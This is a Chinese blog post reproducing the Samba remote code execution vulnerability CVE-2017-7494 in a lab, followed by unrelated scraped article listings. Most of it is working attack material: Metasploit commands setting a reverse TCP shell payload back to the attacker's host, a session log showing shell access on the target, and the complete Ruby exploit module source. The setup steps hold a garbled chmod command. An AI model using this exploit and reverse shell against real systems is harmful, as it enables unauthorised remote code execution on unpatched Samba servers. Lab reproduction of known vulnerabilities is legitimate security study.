一、复现环境搭建

搭建Debian和kali两个虚拟机: 攻击机:kali (192.168.217.162); 靶机:debian (192.168.217.150)。

二、Debian安装并配置samba

1、首先,下载安装samba服务器

# apt-get install samba

2、在debian下创建一个共享目录,我这里为/mnt/shared

# mkdir  /mnt/shared

3、配置samba服务器的配置文件/etc/samba/smb.conf,在最后添加:

[shared]
  comment = 'Share for work'
  path= /mnt/shared
  guest ok = yes
  public = yes
  writable = yes
  create mask = 0777

4、设置/mnt/shared权限

# chmod –R /mnt/sspaned

5、重启samba服务

# /etc/init.d/samba restart

三、设置攻击机kali

打开kali终端进入到metasploit的exploit目录下的linux文件夹,并新建一个smb文件夹,将攻击脚本放入其中:

# cd /usr/share/metasploit-framework/modules/exploits/linux
# mkdir smb
# wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb

运行metasploit,开始进行攻击(攻击脚本被我重命名为(cve-2017-7494.rb)

# msfconsole
msf > use exploit/linux/smb/cve-2017-7494
msf exploit(cve-2017-7494) > set rhost 192.168.217.150
rhost => 192.168.217.150
msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(cve-2017-7494) > set lhost 192.168.217.162
rhost => 192.168.217.162
msf exploit(cve-2017-7494) > run
[*] Started reverse TCP handler on 192.168.217.162:4444
[*] 192.168.217.150:445 - Using location \\192.168.217.150\shared\ for the path
[*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so
[*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so...
[*] Sending stage (38 bytes) to 192.168.217.150
[*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400

id
uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)

ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:6e:9a:4a
inet addr:192.168.217.150 Bcast:192.168.217.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6769 errors:0 dropped:0 overruns:0 frame:0
TX packets:700 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:479898 (468.6 KiB) TX bytes:102796 (100.3 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:35 errors:0 dropped:0 overruns:0 frame:0
TX packets:35 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3557 (3.4 KiB) TX bytes:3557 (3.4 KiB)

whoami
nobody

POC:

 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',
       'Description'    => %q{
           This module triggers an arbitrary shared library load vulnerability
         in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module
         requires valid credentials, a writeable folder in an accessible share,
         and knowledge of the server-side path of the writeable folder. In
         some cases, anonymous access combined with common filesystem locations
         can be used to automatically exploit this vulnerability.
       },
       'Author'         =>
         [
           'steelo <knownsteelo[at]gmail.com>',    # Vulnerability Discovery
           'hdm',                                  # Metasploit Module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
           [ 'CVE', '2017-7494' ],
           [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],
         ],
       'Payload'         =>
         {
           'Space'       => 9000,
           'DisableNops' => true
         },
       'Platform'        => 'linux',
       #
       # Targets are currently limited by platforms with ELF-SO payload wrappers
       #
       'Targets'         =>
         [
           [ 'Linux ARM (LE)',   { 'Arch' => ARCH_ARMLE } ],
           [ 'Linux x86',        { 'Arch' => ARCH_X86 } ],
           [ 'Linux x86_64',     { 'Arch' => ARCH_X64 } ],
         # [ 'Linux MIPS',       { 'Arch' => MIPS } ],
         ],
       'Privileged'      => true,
       'DisclosureDate'  => 'Mar 24 2017',
       'DefaultTarget'   => 2))

     register_options(
       [
         OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),
         OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']),
         OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),
       ])
   end

   def generate_common_locations
     candidates = []
     if datastore['SMB_SHARE_BASE'].to_s.length > 0
       candidates << datastore['SMB_SHARE_BASE']
     end

     %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name|
       candidates << base_name
       candidates << [base_name, @share]
       candidates << [base_name, @share.downcase]
       candidates << [base_name, @share.upcase]
       candidates << [base_name, @share.capitalize]
       candidates << [base_name, @share.gsub(" ", "_")]
     end

     candidates.uniq
   end

   def enumerate_directories(share)
     begin
       self.simple.connect("\\\\#{rhost}\\#{share}")
       stuff = self.simple.client.find_first("\\*")
       directories = [""]
       stuff.each_pair do |entry,entry_attr|
         next if %W{. ..}.include?(entry)
         next unless entry_attr['type'] == 'D'
         directories << entry end return directories rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       vprint_error("Enum #{share}: #{e}")
       return nil

     ensure
       if self.simple.shares["\\\\#{rhost}\\#{share}"]
         self.simple.disconnect("\\\\#{rhost}\\#{share}")
       end
     end
   end

   def verify_writeable_directory(share, directory="")
     begin
       self.simple.connect("\\\\#{rhost}\\#{share}")

       random_filename = Rex::Text.rand_text_alpha(5)+".txt"
       filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}"

       wfd = simple.open(filename, 'rwct')
       wfd << Rex::Text.rand_text_alpha(8) wfd.close simple.delete(filename) return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       vprint_error("Write #{share}#{filename}: #{e}")
       return false

     ensure
       if self.simple.shares["\\\\#{rhost}\\#{share}"]
         self.simple.disconnect("\\\\#{rhost}\\#{share}")
       end
     end
   end

   def share_type(val)
     [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]
   end

   def enumerate_shares_lanman
     shares = []
     begin
       res = self.simple.client.trans(
         "\\PIPE\\LANMAN",
         (
           [0x00].pack('v') +
           "WrLeh\x00"   +
           "B13BWz\x00"  +
           [0x01, 65406].pack("vv")
         ))
     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       vprint_error("Could not enumerate shares via LANMAN")
       return []
     end
     if res.nil?
       vprint_error("Could not enumerate shares via LANMAN")
       return []
     end

     lerror, lconv, lentries, lcount = res['Payload'].to_s[
       res['Payload'].v['ParamOffset'],
       res['Payload'].v['ParamCount']
     ].unpack("v4")

     data = res['Payload'].to_s[
       res['Payload'].v['DataOffset'],
       res['Payload'].v['DataCount']
     ]

     0.upto(lentries - 1) do |i|
       sname,tmp = data[(i * 20) +  0, 14].split("\x00")
       stype     = data[(i * 20) + 14, 2].unpack('v')[0]
       scoff     = data[(i * 20) + 16, 2].unpack('v')[0]
       scoff -= lconv if lconv != 0
       scomm,tmp = data[scoff, data.length - scoff].split("\x00")
       shares << [ sname, share_type(stype), scomm] end shares end def probe_module_path(path) begin simple.create_pipe(path) rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
       vprint_error("Probe: #{path}: #{e}")
     end
   end

   def find_writeable_path(share)
     subdirs = enumerate_directories(share)
     return unless subdirs

     if datastore['SMB_FOLDER'].to_s.length > 0
       subdirs.unshift(datastore['SMB_FOLDER'])
     end

     subdirs.each do |subdir|
       next unless verify_writeable_directory(share, subdir)
       return subdir
     end

     nil
   end

   def find_writeable_share_path
     @path = nil
     share_info = enumerate_shares_lanman
     if datastore['SMB_SHARE_NAME'].to_s.length > 0
       share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']
     end

     share_info.each do |share|
       next if share.first.upcase == 'IPC$'
       found = find_writeable_path(share.first)
       next unless found
       @share = share.first
       @path  = found
       break
     end
   end

   def find_writeable
     find_writeable_share_path
     unless @share && @path
       print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
       fail_with(Failure::NoTarget, "No matching target")
     end
     print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")
   end

   def upload_payload
     begin
       self.simple.connect("\\\\#{rhost}\\#{@share}")

       random_filename = Rex::Text.rand_text_alpha(8)+".so"
       filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"
       wfd = simple.open(filename, 'rwct')
       wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}
       )
       wfd.close

       @payload_name = random_filename
       return true

     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       print_error("Write #{@share}#{filename}: #{e}")
       return false

     ensure
       if self.simple.shares["\\\\#{rhost}\\#{@share}"]
         self.simple.disconnect("\\\\#{rhost}\\#{@share}")
       end
     end
   end

   def find_payload
     print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")

     # Reconnect to IPC$
     simple.connect("\\\\#{rhost}\\IPC$")

     #
     # In a perfect world we would find a way make IPC$'s associated CWD
     # change to our share path, which would allow the following code:
     #
     # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")
     #

     # Until we find a better way, brute force based on common paths
     generate_common_locations.each do |location|
       target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')
       print_status("Trying location #{target}...")
       probe_module_path(target)
     end
   end

   def exploit
     # Setup SMB
     connect
     smb_login

     # Find a writeable share
     find_writeable

     # Upload the shared library payload
     upload_payload

     # Find and execute the payload from the share
     find_payload rescue Rex::StreamClosedError

     # Shutdown
     disconnect
   end

 end

Samba远程代码执行漏洞(CVE-2017-7494)本地复现的更多相关文章

  1. Spring Data REST PATCH请求远程代码执行漏洞(CVE-2017-8046) 本地复现方法

      #1背景 Spring Data REST是Spring Data项目的一部分,可以轻松地在Spring Data存储库之上构建超媒体驱动的REST Web服务. 恶意的PATCH请求使用精心构造 ...

  2. Samba远程代码执行漏洞(CVE-2017-7494)复现

    简要记录一下Samba远程代码执行漏洞(CVE-2017-7494)环境搭建和利用的过程,献给那些想自己动手搭建环境的朋友.(虽然已过多时) 快捷通道:Docker ~ Samba远程代码执行漏洞(C ...

  3. PHP-FPM 远程代码执行漏洞(CVE-2019-11043)的简单复现学习

    1.概述 漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 f ...

  4. Samba远程代码执行-分析(CVE-2017-7494)

    经历了前一阵windows的EternalBlue之后,某天看见了360的 samba高危预警,这个号称linux端的EternalBlue(EternalRed),于是便研究了一波 概述(抄) Sa ...

  5. 【漏洞公告】CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞

    2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定 ...

  6. 服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示

    漏洞信息: 2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.1 ...

  7. 【漏洞公告】Tomcat信息泄漏和远程代码执行漏洞:CVE-2017-12615/CVE-2017-12616

    2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定 ...

  8. Apache Struts 远程代码执行漏洞(CVE-2013-4316)

    漏洞版本: Apache Group Struts < 2.3.15.2 漏洞描述: BUGTRAQ ID: 62587 CVE(CAN) ID: CVE-2013-4316 Struts2 是 ...

  9. MongoDB ‘conn’Mongo 对象远程代码执行漏洞

    漏洞名称: MongoDB ‘conn’Mongo 对象远程代码执行漏洞 CNNVD编号: CNNVD-201307-497 发布时间: 2013-07-25 更新时间: 2013-07-25 危害等 ...

随机推荐

  1. Maven学习(四)

    eclipse创建Maven web项目 1.创建新项目 选择File -> New ->Project 选择New Project窗口中选择 Maven -> Maven Proj ...

  2. 深入理解C#中的String

    关于C#中的类型 在C#中类型分为值类型和引用类型,引用类型和值类型都继承自System.Object类,几乎所有的引用类型都直接从System.Object继承,而值类型具体一点则继承System. ...

  3. iOS开发之 Lottie -- 炫酷的动效

    动效在软件开发中非常常见,炫酷的动画能提升应用的B格,然而由设计师的设计转化成程序猿GG的代码是个非常"痛苦"的过程.对于复杂动画,可能要花费很多时间去研究和实现.Lottie 的 ...

  4. kafka 自定义分区器

    package cn.xiaojf.kafka.producer; import org.apache.kafka.clients.producer.Partitioner; import org.a ...

  5. CCNA毕业测试

    要求: 1:不同楼层物理隔离,但逻辑相连 2:相同楼层物理相连,但逻辑隔离 3:主机可以动态获取IP地址 4:不同VLAN间可以进行通信 5:主机最终访问www.baidu.com弹出Congratu ...

  6. MySQL存储汉字

    之前在网上查找了很多方法,排在前排的都是修改配置文件my.ini的,没有成功,后来找到了一个解决方法: 在建表的时候,在语句后面加上段"engine = innodb default cha ...

  7. JavaScript实现单击全选 ,再次点击取消全选

                 以下为实现思路,已测试,供参考 var allSet = document.getElementById('allSet');//获取全选按钮元素 var a = allSe ...

  8. JavaWeb系列:Servlet

    个人整理,欢迎转载与批评建议,转载请添加索引,谢谢. ---------------------------------------------------------------2017.06.10 ...

  9. Vue 非父子组件通信

    组件是Vue核心的一块内容,组件之间的通信也是很基本的开发需求.组件通信又包括父组件向子组件传数据,子组件向父组件传数据,非父子组件间的通信.前两种通信Vue的文档都说的很清楚,但是第三种文档上确只有 ...

  10. Vue爬坑之vuex初识

    在 Vue.js 的项目中,如果项目结构简单, 父子组件之间的数据传递可以使用  props 或者 $emit 等方式 http://www.cnblogs.com/wisewrong/p/62660 ...